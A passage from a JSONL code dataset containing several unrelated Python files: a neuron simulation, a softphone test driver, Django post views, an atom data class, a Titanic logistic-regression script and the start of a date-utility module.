wrapper):\n self._loaded_services.append(wrapper.wrapped_class(wrapper.wrapped_tasks, wrapper.wrapped_class.__doc__))\n","sub_path":"service/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"221931746","text":"import brian2 as bs\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom bayesian_test.utils import visualise_connectivity\n\nw_input_to_place = 26.0 * bs.mV\nTAU_M = 17.0 * bs.ms\nTAU_S = 5.0 * bs.ms\nthreshold = -55.0 * bs.mV\nv_rest = -80.0 * bs.mV\nv_reset = -80.0 * bs.mV\ne = 2.71828182846\nbs.seed(seed=19971124)\n\ndt = 0.1\n\nlif = \"\"\"\n dv/dt = (v_rest - v)/tau_m : volt (unless refractory)\n tau_m : second\n \"\"\"\n\nsynaptic_update = \"\"\"\n v_post += w_input_to_place\n \"\"\"\n\nthreshold_eq = \"v > (1+1/e)*(w_input_to_place + v_rest) + w_input_to_place\"\nreset_eq = \"v = v_reset\"\n\nSIM_TIME = 5\n\n\ndef generate_gaussian_spike_train(mean, std):\n \"\"\"\n https://brian2.readthedocs.io/en/stable/user/input.html use timed arrays\n \"\"\"\n coef = 1 / (std * (2 * np.pi) ** (0.5))\n train = []\n time = np.linspace(0, SIM_TIME, num=int(SIM_TIME / dt))\n train = np.zeros_like(time)\n for i, t in enumerate(time):\n print(t)\n exp = -0.5 * ((t - mean) / std) ** 2\n rate = coef * np.exp(exp)\n train[i] = rate\n\n train = train * 40\n plt.plot(time, train)\n plt.xlabel('Time (ms)')\n plt.ylabel('Rates')\n plt.title(f\"SpikeTrain\")\n plt.show()\n return train\n\n\ndef interp_based(a, N=10):\n s = N\n l = (a.size - 1) * s + 1 # total length after interpolation\n return np.interp(np.arange(l), np.arange(l, step=s), a)\n\n\ndef simulation1():\n bs.start_scope()\n\n rates = [5, 10, 15]\n bs.store()\n\n train1 = generate_gaussian_spike_train(mean=1.5, std=1.7)\n train2 = generate_gaussian_spike_train(mean=3, std=1.7)\n # exit(0)\n train_len = train1.shape[0]\n # train_len = 10\n\n total_time = None\n total_spikes = None\n\n for i in range(train_len):\n r1 = train1[i]\n r2 = train2[i]\n place_cell = bs.NeuronGroup(1, model=lif, reset=reset_eq, threshold=threshold_eq, refractory=TAU_M,\n method=\"euler\")\n\n place_cell.tau_m = TAU_M\n # place_cell.tau_s = TAU_S\n\n place_cell.v = -80.0 * bs.mV\n\n print(f\"Rates: {r1, r2}\")\n # bs.restore()\n input = bs.PoissonGroup(2, rates=np.array([r1, r2]) * bs.Hz)\n\n # connect input poisson spike generator to the input cells (grid and boundary vector)\n S1 = bs.Synapses(input, place_cell, on_pre=synaptic_update)\n S1.connect = S1.connect(i=[0, 1], j=0)\n step_per_time = 100\n place_cell_v_monitor = bs.StateMonitor(place_cell, 'v', record=True, dt=(dt / step_per_time) * bs.second)\n\n place_cell_monitor = bs.SpikeMonitor(source=place_cell)\n\n bs.run(dt * bs.second)\n\n spikes_i = place_cell_monitor.i\n spikes_t = place_cell_monitor.t\n\n print(spikes_i)\n print(spikes_t)\n\n if total_spikes is None:\n total_spikes = spikes_t / bs.ms\n else:\n total_spikes = np.concatenate([total_spikes, (i * step_per_time) + spikes_t / bs.ms])\n\n print(\"time\", place_cell_v_monitor.t / bs.ms)\n if total_time is None:\n total_time = place_cell_v_monitor.t / bs.ms\n else:\n total_time = np.concatenate([total_time, (i * step_per_time) + place_cell_v_monitor.t / bs.ms])\n total_time = interp_based(total_time, N=10)\n print(type(total_time))\n print(total_time.shape)\n print(total_time)\n print(total_spikes)\n plt.figure()\n _, ind, _ = np.intersect1d(total_time, total_spikes, assume_unique=True, return_indices=True)\n spikes = np.zeros_like(total_time)\n spikes[ind] = 1\n plt.plot(total_time, spikes)\n plt.xlabel('Time (ms)')\n plt.ylabel('v')\n plt.title(f\"Spikes\")\n plt.show()\n # print(spikes_i, spikes_t)\n # print(place_cell_v_monitor.v)\n # print(type(place_cell_v_monitor.t), type(place_cell_v_monitor.v[0]))\n # plt.figure()\n # plt.plot(place_cell_v_monitor.t / bs.ms, place_cell_v_monitor.v[0])\n # plt.xlabel('Time (ms)')\n # plt.ylabel('v')\n # plt.title(f\"Rates: {r1, r2}\")\n # plt.show()\n\n\nif __name__ == '__main__':\n simulation1()\n","sub_path":"bayesian_test/place_cell_paper_result_second_try.py","file_name":"place_cell_paper_result_second_try.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"475072978","text":"\"\"\"Class functions related to softphone software.\"\"\"\nfrom boardfarm.lib.dns import DNS\nfrom boardfarm.lib.installers import install_pjsua\n\n\nclass SoftPhone(object):\n \"\"\"Perform Functions related to softphone software.\"\"\"\n\n model = \"pjsip\"\n profile = {}\n\n def __init__(self, *args, **kwargs):\n \"\"\"Instance initialization.\"\"\"\n self.args = args\n self.kwargs = kwargs\n self.own_number = self.kwargs.get(\"number\", \"3000\")\n self.num_port = self.kwargs.get(\"num_port\", \"5060\")\n self.config_name = \"pjsip.conf\"\n self.pjsip_local_url = kwargs.get(\"local_site\", None)\n self.pjsip_prompt = \">>>\"\n self.profile[self.name] = self.profile.get(self.name, {})\n softphone_profile = self.profile[self.name] = {}\n softphone_profile[\"on_boot\"] = self.install_softphone\n self.dns = DNS(self, kwargs.get(\"options\", {}), kwargs.get(\"aux_ip\", {}))\n\n def __str__(self):\n \"\"\"Magic method to return a printable string.\"\"\"\n return \"softphone\"\n\n def install_softphone(self):\n \"\"\"Install softphone from local url or from internet.\"\"\"\n self.prefer_ipv4()\n install_pjsua(self, getattr(self, \"pjsip_local_url\", None))\n\n def phone_config(self, sipserver_ip):\n \"\"\"Configure the soft phone.\n\n Arguments:\n sipserver_ip(str): ip of sip server\n \"\"\"\n conf = (\n \"\"\"(\n echo --local-port=\"\"\"\n + self.num_port\n + \"\"\"\n echo --id=sip:\"\"\"\n + self.own_number\n + \"\"\"@\"\"\"\n + sipserver_ip\n + \"\"\"\n echo --registrar=sip:\"\"\"\n + sipserver_ip\n + \"\"\"\n echo --realm=*\n echo --username=\"\"\"\n + self.own_number\n + \"\"\"\n echo --password=1234\n echo --null-audio\n echo --max-calls=1\n echo --auto-answer=180\n )> \"\"\"\n + self.config_name\n )\n self.sendline(conf)\n self.expect(self.prompt)\n\n def phone_start(self):\n \"\"\"Start the soft phone.\n\n Note: Start softphone only when asterisk server is running to avoid failure\n \"\"\"\n self.sendline(\"pjsua --config-file=\" + self.config_name)\n self.expect(r\"registration success, status=200 \\(OK\\)\")\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n\n def dial(self, dial_number, receiver_ip):\n \"\"\"Dial to the other phone.\n\n Arguments:\n dial_number(str): number to dial\n receiver_ip(str): ip of the receiver,it is mta ip the call is dialed to mta\n \"\"\"\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n self.sendline(\"m\")\n self.expect(r\"Make call\\:\")\n self.sendline(\"sip:\" + dial_number + \"@\" + receiver_ip)\n self.expect(\"Call [0-9]* state changed to CALLING\")\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n\n def answer(self):\n \"\"\"To answer the incoming call in soft phone.\"\"\"\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n self.sendline(\"a\")\n self.expect(r\"Answer with code \\(100\\-699\\) \\(empty to cancel\\)\\:\")\n self.sendline(\"200\")\n self.expect(\"Call [0-9]* state changed to CONFIRMED\")\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n\n def hangup(self):\n \"\"\"To hangup the ongoing call.\"\"\"\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n self.sendline(\"h\")\n self.expect(\"DISCON\")\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n\n def reinvite(self):\n \"\"\"To re-trigger the Invite message\"\"\"\n self.sendline(\"\\n\")\n self.expect(self.pjsip_prompt)\n self.sendline(\"v\")\n self.expect(\"Sending re-INVITE on call [0-9]*\")\n self.expect(\"SDP negotiation done: Success\")\n self.sendline(\"\\n\")\n self.expect(self.pjsip_prompt)\n\n def hold(self):\n \"\"\"To hold the current call\"\"\"\n self.sendline(\"\\n\")\n self.expect(self.pjsip_prompt)\n self.sendline(\"H\")\n self.expect(\"Putting call [0-9]* on hold\")\n self.sendline(\"\\n\")\n self.expect(self.pjsip_prompt)\n\n def phone_kill(self):\n \"\"\"To kill the pjsip session.\"\"\"\n # De-Registration is required before quit a phone and q will handle it\n self.sendline(\"q\")\n self.expect(self.prompt)\n\n def validate_state(self, msg):\n \"\"\"Verify the message to validate the status of the call\n\n :param msg: The message to expect on the softphone container\n :type msg: string\n :example usage:\n validate_state('INCOMING') to validate an incoming call.\n validate_state('Current call id= to [CONFIRMED]') to validate call connected.\n :return: boolean True if success\n :rtype: Boolean\n \"\"\"\n self.sendline(\"/n\")\n self.expect(self.pjsip_prompt)\n if msg == \"INCOMING\":\n msg = \"180 Ringing\"\n self.expect(msg)\n self.expect(self.pjsip_prompt)\n return True\n","sub_path":"boardfarm/devices/softphone.py","file_name":"softphone.py","file_ext":"py","file_size_in_byte":5105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"534832023","text":"from django.shortcuts import render, get_object_or_404\nfrom django.shortcuts import redirect\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom .forms import *\nfrom .models import *\nfrom events.models import Event\nfrom django.utils import timezone\nfrom notify.signals import notify\nfrom django.contrib.auth.decorators import login_required\nfrom czaswolny.decorators import user_not_banned\nfrom django.views.decorators.http import require_POST\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\n@login_required\n@user_not_banned\ndef index(request):\n return render(request, 'posts/index.html')\n\n\n@login_required\n@user_not_banned\ndef create(request, pk):\n if request.method == \"POST\":\n event = get_object_or_404(Event, pk=pk)\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.publish_date = timezone.now()\n post.save()\n event.posts.add(post)\n return redirect('events:details', pk=event.pk)\n else:\n form = PostForm()\n return render(request, 'posts/create.html', {'form': form})\n\n\n@login_required\n@user_not_banned\ndef createcomment(request, pk, pk2):\n if request.method == \"POST\":\n post = get_object_or_404(Post, pk=pk)\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.author = request.user\n comment.publish_date = timezone.now()\n comment.save()\n post.comments.add(comment)\n if request.user != post.author:\n notify.send(request.user, recipient=post.author, actor=request.user, verb='commented your post.', nf_type='post_commented')\n return redirect('posts:details', pk=post.pk, pk2=pk2)\n else:\n form = CommentForm()\n return render(request, 'posts/createcomment.html', {'form': form})\n\n\n@login_required\n@user_not_banned\ndef details(request, pk, pk2):\n if pk is None:\n return HttpResponseRedirect(reverse('events:index'))\n if pk2 is None:\n return HttpResponseRedirect(reverse('events:index'))\n\n post = get_object_or_404(Post, pk=pk)\n event = get_object_or_404(Event, pk=pk2)\n comments_all = post.comments.all().order_by('-publish_date')\n\n # Paginacja co 5 odpowiedzi\n paginator = Paginator(comments_all, 5)\n page = request.GET.get('page', 1)\n try:\n comments = paginator.page(page)\n except PageNotAnInteger:\n comments = paginator.page(1)\n except EmptyPage:\n comments = paginator.page(paginator.num_pages)\n\n return render(request, 'posts/details.html', {'post': post, 'event': event, 'comments': comments})\n\n\n@require_POST\n@login_required\n@user_not_banned\ndef destroy(request, pk, pk2):\n if pk is None:\n return HttpResponseRedirect(reverse('events:index'))\n event = get_object_or_404(Event, pk=pk2)\n post = get_object_or_404(Post, pk=pk)\n\n if request.user != post.author:\n return HttpResponseRedirect(reverse('events:index'))\n\n post.delete()\n return redirect('events:details', pk=event.pk)\n\n\n@require_POST\n@login_required\n@user_not_banned\ndef destroycomment(request, pk, pk2, pk3):\n if pk is None:\n return HttpResponseRedirect(reverse('events:index'))\n if pk2 is None:\n return HttpResponseRedirect(reverse('events:index'))\n event = get_object_or_404(Event, pk=pk2)\n post = get_object_or_404(Post, pk=pk)\n comment = get_object_or_404(Comment, pk=pk3)\n\n if request.user != comment.author:\n return HttpResponseRedirect(reverse('events:index'))\n\n comment.delete()\n return redirect('posts:details', pk=post.pk, pk2=event.pk)\n\n\n@require_POST\n@login_required\n@user_not_banned\ndef like(request, pk, pk2):\n if pk is None:\n return HttpResponseRedirect(reverse('posts:index'))\n\n post = get_object_or_404(Post, pk=pk)\n event = get_object_or_404(Event, pk=pk2)\n comments = post.comments.all()\n post.likes.add(request.user)\n\n return render(request, 'posts/details.html', {'post': post, 'event': event, 'comments': comments})\n\n\n@require_POST\n@login_required\n@user_not_banned\ndef unlike(request, pk, pk2):\n if pk is None:\n return HttpResponseRedirect(reverse('events:index'))\n\n post = get_object_or_404(Post, pk=pk)\n event = get_object_or_404(Event, pk=pk2)\n comments = post.comments.all()\n post.likes.remove(request.user)\n\n return render(request, 'posts/details.html', {'post': post, 'event': event, 'comments': comments})\n","sub_path":"posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"177792672","text":"# -*- coding: utf-8 -*-\n\"\"\"\n============================================================================\nBase class for structure data atom (:mod:`sknano.structure_io.atoms._atom`)\n============================================================================\n\n.. currentmodule:: sknano.structure_io.atoms._atom\n\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\n__docformat__ = 'restructuredtext en'\n\nfrom collections import OrderedDict\n\nimport numpy as np\n\nfrom ...tools import Vector, xyz_axes\nfrom ...tools.refdata import atomic_masses, atomic_mass_symbol_map, \\\n atomic_numbers, atomic_number_symbol_map, element_symbols\n\n__all__ = ['Atom']\n\n\nclass Atom(object):\n \"\"\"Base class for structure data atom.\n\n Parameters\n ----------\n element : {str, int}, optional\n A string representation of the element symbol or an integer specifying\n an element atomic number.\n x, y, z : float, optional\n :math:`x, y, z` coordinates of `Atom`.\n\n \"\"\"\n\n def __init__(self, element=None, m=None, x=None, y=None, z=None):\n\n self._r = Vector(x=x, y=y, z=z)\n\n self._m = None\n self._symbol = None\n self._Z = None\n\n if isinstance(element, (int, float)):\n self._Z = int(element)\n idx = self._Z - 1\n try:\n self._symbol = element_symbols[idx]\n self._m = atomic_masses[self._symbol]\n except KeyError:\n print('unrecognized element number: {}'.format(element))\n elif isinstance(element, str):\n self._symbol = element\n try:\n self._Z = atomic_numbers[self._symbol]\n self._m = atomic_masses[self._symbol]\n except KeyError:\n print('Unrecognized atomic symbol: {}'.format(element))\n else:\n self._symbol = None\n self._Z = None\n if m is not None and isinstance(m, (int, float)):\n try:\n if isinstance(m, float):\n self._symbol = atomic_mass_symbol_map[m]\n elif isinstance(m, int):\n self._symbol = atomic_number_symbol_map[int(m / 2)]\n self._Z = atomic_numbers[self._symbol]\n self._m = atomic_masses[self._symbol]\n except KeyError:\n self._symbol = None\n self._Z = None\n self._m = m\n else:\n self._m = 0\n\n self._atomdict = OrderedDict()\n self._atomdict['element'] = self._symbol\n self._atomdict['x'] = self._r.x\n self._atomdict['y'] = self._r.y\n self._atomdict['z'] = self._r.z\n\n self._attributes = ['symbol', 'Z', 'm', 'r']\n\n def __str__(self):\n \"\"\"Return string representation of atom.\"\"\"\n atom_str = ''\n for attr in self._attributes:\n atom_str += \\\n 'Atom {}: {}\\n'.format(attr, getattr(self, '_' + attr))\n return atom_str\n\n @property\n def atomdict(self):\n \"\"\"Return dictionary of atom attributes.\"\"\"\n return self._atomdict\n\n @property\n def Z(self):\n \"\"\"Atomic number :math:`Z`.\n\n Returns\n -------\n int\n Atomic number :math:`Z`.\n \"\"\"\n return self._Z\n\n @property\n def element(self):\n \"\"\"Element symbol.\n\n Returns\n -------\n str\n Element symbol.\n \"\"\"\n return self.symbol\n\n @property\n def symbol(self):\n \"\"\"Element symbol.\n\n Returns\n -------\n str\n Element symbol.\n \"\"\"\n return self._symbol\n\n @property\n def m(self):\n \"\"\"Atomic mass :math:`m_a` in atomic mass units.\n\n Returns\n -------\n float\n Atomic mass :math:`m_a` in atomic mass units.\n \"\"\"\n return self._m\n\n @property\n def x(self):\n \"\"\":math:`x`-coordinate in units of **Angstroms**.\n\n Returns\n -------\n float\n :math:`x`-coordinate in units of **Angstroms**.\n\n \"\"\"\n return self._r.x\n\n @x.setter\n def x(self, value=float):\n \"\"\"Set `Atom` :math:`x`-coordinate in units of **Angstroms**.\n\n Parameters\n ----------\n value : float\n :math:`x`-coordinate in units of **Angstroms**.\n\n \"\"\"\n self._r.x = self._atomdict['x'] = value\n\n @property\n def y(self):\n \"\"\":math:`y`-coordinate in units of **Angstroms**.\n\n Returns\n -------\n float\n :math:`y`-coordinate in units of **Angstroms**.\n\n \"\"\"\n return self._r.y\n\n @y.setter\n def y(self, value=float):\n \"\"\"Set `Atom` :math:`y`-coordinate in units of **Angstroms**.\n\n Parameters\n ----------\n value : float\n :math:`y`-coordinate in units of **Angstroms**.\n\n \"\"\"\n self._r.y = self._atomdict['y'] = value\n\n @property\n def z(self):\n \"\"\":math:`z`-coordinate in units of **Angstroms**.\n\n Returns\n -------\n float\n :math:`z`-coordinate in units of **Angstroms**.\n\n \"\"\"\n return self._r.z\n\n @z.setter\n def z(self, value=float):\n \"\"\"Set `Atom` :math:`z`-coordinate in units of **Angstroms**.\n\n Parameters\n ----------\n value : float\n :math:`z`-coordinate in units of **Angstroms**.\n\n \"\"\"\n self._r.z = self._atomdict['z'] = value\n\n @property\n def r(self):\n \"\"\":math:`x, y, z` coordinates of `Atom` in units of **Angstroms**.\n\n Returns\n -------\n ndarray\n 3-element ndarray of [:math:`x, y, z`] coordinates of `Atom`.\n\n \"\"\"\n return self._r.components\n\n @r.setter\n def r(self, value=np.ndarray):\n \"\"\"Set :math:`x, y, z` coordinates of `Atom`.\n\n Parameters\n ----------\n value : array_like\n 3-element array of :math:`x, y, z`-coordinates in units of\n **Angstroms**.\n\n \"\"\"\n self.x, self.y, self.z = value[0], value[1], value[2]\n\n def fix_minus_zero_coords(self, epsilon=1.0e-10):\n \"\"\"Set really really small negative coordinates to zero.\n\n Set all coordinates with absolute value less than\n epsilon zero so we don't end up with -0.00000\n coordinates in structure data output.\n\n Parameters\n ----------\n epsilon : float\n smallest allowed absolute value of any :math:`x,y,z` component.\n\n \"\"\"\n self._r.fix_minus_zero_components(epsilon=epsilon)\n\n def get_coords(self, components=None, as_dict=False):\n \"\"\"Return atom coords.\n\n Parameters\n ----------\n components : {None, sequence}, optional\n as_dict : bool, optional\n\n Returns\n -------\n coords : :py:class:`python:~collections.OrderedDict` or ndarray\n\n \"\"\"\n coords = self.r\n if as_dict:\n if components is None or components == 'r':\n components = ('x', 'y', 'z')\n elif isinstance(components, str):\n components = (components,)\n\n return OrderedDict(zip(\n components, [coords[xyz_axes.index(component)] for\n component in components]))\n else:\n return coords\n\n def rezero_coords(self, epsilon=1.0e-10):\n \"\"\"Re-zero position coordinates near zero.\n\n Set position coordinates with absolute value less than `epsilon` to\n zero.\n\n Parameters\n ----------\n epsilon : float\n smallest allowed absolute value of any :math:`x,y,z` component.\n\n \"\"\"\n self._r.rezero_components(epsilon=epsilon)\n","sub_path":"sknano/structure_io/atoms/_atom.py","file_name":"_atom.py","file_ext":"py","file_size_in_byte":7785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"506278269","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 25 21:20:54 2018\n\n@author: victor\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\n\ntrain = pd.read_csv('titanic_train.csv')\n\nplt.figure(figsize=(12,6))\nsns.heatmap(train.isnull(), yticklabels=False, cbar=False, cmap='viridis')\n\nsns.set_style('whitegrid')\nsns.countplot(x='Survived', data=train, hue='Pclass', palette='rainbow')\n\ntrain['Age'].hist(bins=30, color='darkred', alpha=0.4)\n\nsns.countplot(x='SibSp', data=train)\n\ntrain[train['SibSp']==0]['Age'].hist(bins=30)\n\nplt.figure(figsize=(12, 6))\nsns.boxplot(x='Pclass', y='Age', data=train)\n\ndef inputar_idade(cols):\n idade = cols[0]\n classe = cols[1]\n \n if(pd.isnull(idade)):\n if(classe == 1):\n return 37\n elif(classe == 2):\n return 29\n else:\n return 24\n else:\n return idade \n\ntrain['Age'] = train[['Age', 'Pclass']].apply(inputar_idade, axis=1)\n\ndel train['Cabin']\n# train.drop['Cabin', implace=True]\n\ntrain.dropna(inplace=True)\n\n#plt.figure(figsize=(12,6))\n#sns.heatmap(train.isnull(), yticklabels=False, cbar=False, cmap='viridis')\n\nsex = pd.get_dummies(train['Sex'], drop_first=True)\n\nembark = pd.get_dummies(train['Embarked'], drop_first=True)\n\ntrain.drop(['Sex', 'PassengerId', 'Name', 'Ticket'], axis=1, inplace=True)\n\ntrain = pd.concat([train, sex, embark], axis=1)\n\ndel train['Embarked']\n\nx_train, x_test, y_train, y_test = train_test_split(train.drop('Survived', axis=1), train['Survived'], test_size=0.3)\n\nlogmodel = LogisticRegression()\n\nlogmodel.fit(x_train, y_train)\n\nprections = logmodel.predict(x_test)\n\nprint(classification_report(y_test, prections))\nprint()\nprint(confusion_matrix(y_test, prections))\n","sub_path":"regressoesLogistica/aula02.py","file_name":"aula02.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"81471130","text":"#### PATTERN | DB ##################################################################################\n# -*- coding: utf-8 -*-\n# Copyright (c) 2010 University of Antwerp, Belgium\n# Author: Tom De Smedt \n# License: BSD (see LICENSE.txt for details).\n# http://www.clips.ua.ac.be/pages/pattern\n\n####################################################################################################\n\nimport os\nimport sys\nimport inspect\nimport re\nimport base64\nimport json\n\nimport csv as csvlib\n\nfrom codecs import BOM_UTF8\nfrom itertools import islice\nfrom datetime import datetime, timedelta\nfrom calendar import monthrange\nfrom time import mktime, strftime\nfrom math import sqrt\n\nfrom functools import cmp_to_key\n\nfrom io import open, StringIO, BytesIO\n\nBOM_UTF8 = BOM_UTF8.decode(\"utf-8\")\n\nfrom html.entities import name2codepoint\n\nfrom email.utils import parsedate_tz, mktime_tz\n\ntry:\n MODULE = os.path.dirname(os.path.realpath(__file__))\nexcept:\n MODULE = \"\"\n\nfrom pattern.helpers import encode_string, decode_string\n\ndecode_utf8 = decode_string\nencode_utf8 = encode_string\n\nALL = \"*\"\n\n_sum = sum # pattern.db.sum() is also a column aggregate function.\n\n#### DATE FUNCTIONS ################################################################################\n\nNOW, YEAR = \"now\", datetime.now().year\n\n# Date formats can be found in the Python documentation:\n# http://docs.python.org/library/time.html#time.strftime\nDEFAULT_DATE_FORMAT = \"%Y-%m-%d %H:%M:%S\"\ndate_formats = [\n DEFAULT_DATE_FORMAT, # 2010-09-21 09:27:01 => SQLite + MySQL\n \"%Y-%m-%dT%H:%M:%SZ\", # 2010-09-20T09:27:01Z => Bing\n \"%a, %d %b %Y %H:%M:%S +0000\", # Fri, 21 Sep 2010 09:27:01 +000 => Twitter\n \"%a %b %d %H:%M:%S +0000 %Y\", # Fri Sep 21 09:21:01 +0000 2010 => Twitter\n \"%Y-%m-%dT%H:%M:%S+0000\", # 2010-09-20T09:27:01+0000 => Facebook\n \"%Y-%m-%d %H:%M\", # 2010-09-21 09:27\n \"%Y-%m-%d\", # 2010-09-21\n \"%d/%m/%Y\", # 21/09/2010\n \"%d %B %Y\", # 21 September 2010\n \"%d %b %Y\", # 21 Sep 2010\n \"%B %d %Y\", # September 21 2010\n \"%B %d, %Y\", # September 21, 2010\n]\n\n\ndef _yyyywwd2yyyymmdd(year, week, weekday):\n \"\"\" Returns (year, month, day) for given (year, week, weekday).\n \"\"\"\n d = datetime(year, month=1, day=4) # 1st week contains January 4th.\n d = d - timedelta(d.isoweekday() - 1) + timedelta(days=weekday - 1, weeks=week - 1)\n return (d.year, d.month, d.day)\n\n\ndef _strftime1900(d, format):\n \"\"\" Returns the given date formatted as a string.\n \"\"\"\n if d.year < 1900: # Python's strftime() doesn't handle year < 1900.\n return strftime(format, (1900,) + d.timetuple()[1:]).replace(\"1900\", str(d.year), 1)\n return datetime.strftime(d, format)\n\n\nclass DateError(Exception):\n pass\n\n\nclass Date(datetime):\n \"\"\" A convenience wrapper for datetime.datetime with a default string format.\n \"\"\"\n format = DEFAULT_DATE_FORMAT\n # Date.year\n # Date.month\n # Date.day\n # Date.minute\n # Date.second\n\n @property\n def minutes(self):\n return self.minute\n\n @property\n def seconds(self):\n return self.second\n\n @property\n def microseconds(self):\n return self.microsecond\n\n @property\n def week(self):\n return self.isocalendar()[1]\n\n @property\n def weekday(self):\n return self.isocalendar()[2]\n\n @property\n def timestamp(self):\n\n # In Python 3, years before 1900 are accepted whilee mktime() raises ValueError in Python 2. Let's stick to this.\n if self.timetuple().tm_year < 1900:\n raise ValueError(\"year out of range\")\n\n return int(mktime(self.timetuple())) # Seconds elapsed since 1/1/1970.\n\n def strftime(self, format):\n return _strftime1900(self, format)\n\n def copy(self):\n return date(self.timestamp)\n\n def __str__(self):\n return self.strftime(self.format)\n\n def __repr__(self):\n return \"Date(%s)\" % repr(self.__str__())\n\n def __iadd__(self, t):\n return self.__add__(t)\n\n def __isub__(self, t):\n return self.__sub__(t)\n\n def __add__(self, t):\n d = self\n if getattr(t, \"years\", 0) \\\n or getattr(t, \"months\", 0):\n # January 31 + 1 month = February 28.\n y = (d.month + t.months - 1) // 12 + d.year + t.years\n m = (d.month + t.months + 0) % 12 or 12\n r = monthrange(y, m)\n d = date(y, m, min(d.day, r[1]), d.hour, d.minute, d.second, d.microsecond)\n d = datetime.__add__(d, t)\n return date(d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond, self.format)\n\n def __sub__(self, t):\n if isinstance(t, (Date, datetime)):\n # Subtracting two dates returns a Time.\n t = datetime.__sub__(self, t)\n return Time(+t.days, +t.seconds,\n microseconds = +t.microseconds)\n if isinstance(t, (Time, timedelta)):\n return self + Time(-t.days, -t.seconds,\n microseconds = -t.microseconds,\n months = -getattr(t, \"months\", 0),\n years = -getattr(t, \"years\", 0))\n\n\ndef date(*args, **kwargs):\n \"\"\" Returns a Date from the given parameters:\n - date(format=Date.format) => now\n - date(int)\n - date(string)\n - date(string, format=Date.format)\n - date(string, inputformat, format=Date.format)\n - date(year, month, day, format=Date.format)\n - date(year, month, day, hours, minutes, seconds, format=Date.format)\n If a string is given without an explicit input format, all known formats will be tried.\n \"\"\"\n d = None\n f = None\n if len(args) == 0 \\\n and kwargs.get(\"year\") is not None \\\n and kwargs.get(\"month\") \\\n and kwargs.get(\"day\"):\n # Year, month, day.\n d = Date(**kwargs)\n elif kwargs.get(\"week\"):\n # Year, week, weekday.\n f = kwargs.pop(\"format\", None)\n d = Date(*_yyyywwd2yyyymmdd(\n kwargs.pop(\"year\", args and args[0] or Date.now().year),\n kwargs.pop(\"week\"),\n kwargs.pop(\"weekday\", kwargs.pop(\"day\", 1))), **kwargs)\n elif len(args) == 0 or args[0] == NOW:\n # No parameters or one parameter NOW.\n d = Date.now()\n elif len(args) == 1 \\\n and isinstance(args[0], (Date, datetime)):\n # One parameter, a Date or datetime object.\n d = Date.fromtimestamp(int(mktime(args[0].timetuple())))\n d += time(microseconds=args[0].microsecond)\n elif len(args) == 1 \\\n and (isinstance(args[0], int) \\\n or isinstance(args[0], (str, bytes)) and args[0].isdigit()):\n # One parameter, an int or string timestamp.\n if isinstance(args[0], bytes):\n args = (args[0].decode(\"utf-8\"),)\n d = Date.fromtimestamp(int(args[0]))\n elif len(args) == 1 \\\n and isinstance(args[0], (str, bytes)):\n # One parameter, a date string for which we guess the input format (RFC2822 or known formats).\n if isinstance(args[0], bytes):\n args = (args[0].decode(\"utf-8\"),)\n try:\n d = Date.fromtimestamp(mktime_tz(parsedate_tz(args[0])))\n except:\n for format in (\"format\" in kwargs and [kwargs[\"format\"]] or []) + date_formats:\n try:\n d = Date.strptime(args[0], format)\n break\n except:\n pass\n if d is None:\n raise DateError(\"unknown date format for %s\" % repr(args[0]))\n elif len(args) == 2 \\\n and isinstance(args[0], (str, bytes)):\n # Two parameters, a date string and an explicit input format.\n if isinstance(args[0], bytes):\n args = (args[0].decode(\"utf-8\"), args[1].decode(\"utf-8\"))\n d = Date.strptime(args[0], args[1])\n elif len(args) >= 3:\n # 3-6 parameters: year, month, day, hours, minutes, seconds.\n f = kwargs.pop(\"format\", None)\n d = Date(*args[:7], **kwargs)\n else:\n raise DateError(\"unknown date format\")\n d.format = kwargs.get(\"format\") or len(args) > 7 and args[7] or f or Date.format\n return d\n\n\nclass Time(timedelta):\n\n def __new__(cls, *args, **kwargs):\n \"\"\" A convenience wrapper for datetime.timedelta that handles months and years.\n \"\"\"\n # Time.years\n # Time.months\n # Time.days\n # Time.seconds\n # Time.microseconds\n y = kwargs.pop(\"years\", 0)\n m = kwargs.pop(\"months\", 0)\n t = timedelta.__new__(cls, *args, **kwargs)\n setattr(t, \"years\", y)\n setattr(t, \"months\", m)\n return t\n\n\ndef time(days=0, seconds=0, minutes=0, hours=0, **kwargs):\n \"\"\" Returns a Time that can be added to a Date object.\n Other parameters: microseconds, milliseconds, weeks, months, years.\n \"\"\"\n return Time(days=days, seconds=seconds, minutes=minutes, hours=hours, **kwargs)\n\n\ndef string(value, default=\"\"):\n \"\"\" Returns the value cast to unicode, or default if it is None/empty.\n \"\"\"\n # Useful 